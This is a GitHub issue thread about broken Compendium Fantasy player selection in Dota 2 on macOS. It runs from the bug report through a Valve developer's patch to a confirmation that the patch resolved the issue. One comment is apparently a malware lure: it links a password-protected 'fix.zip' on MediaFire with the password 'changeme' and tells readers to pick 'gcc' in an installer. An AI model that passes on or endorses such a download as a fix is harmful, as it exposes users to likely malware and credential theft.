### ISSUE TITLE
[MacOs] Compendium Fantasy is broken

### ISSUE THREAD

**Issue by lvot** [ValveSoftware/Dota-2#2798]
#### Your system information

* System information from steam https://gist.github.com/lvot/eac68bd0fc665cb4fbd2354386f18409

#### Please describe your issue in as much detail as possible:
Fantasy player selection is broken. When I click to pick mid/carry/sup no player cards are shown and I cannot select anyone.
<img width="1418" alt="image" src="https://github.com/user-attachments/assets/0ebfa528-a218-4694-b4b1-7ab62da60184">

Same issues on Reddit:
https://www.reddit.com/r/DotA2/comments/1f0k34i/fantasy_roster_broken/
https://www.reddit.com/r/DotA2/comments/1f112o7/fantasy_in_the_new_compendium_is_not_working_it/

I suppose this should be urgently fixed as first hero lock up is in 8 days

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by homerblr** [comment]
Same issue, latest patch included. m2 pro

**Comment by chrisf-valve** [comment]
Hello, 

We shipped a speculative fix and some extra debugging information on 8/28. Please give it another shot and let us know if the issue persists!

**Comment by homerblr** [comment]
Issue is resolved with new patch. M2 Pro
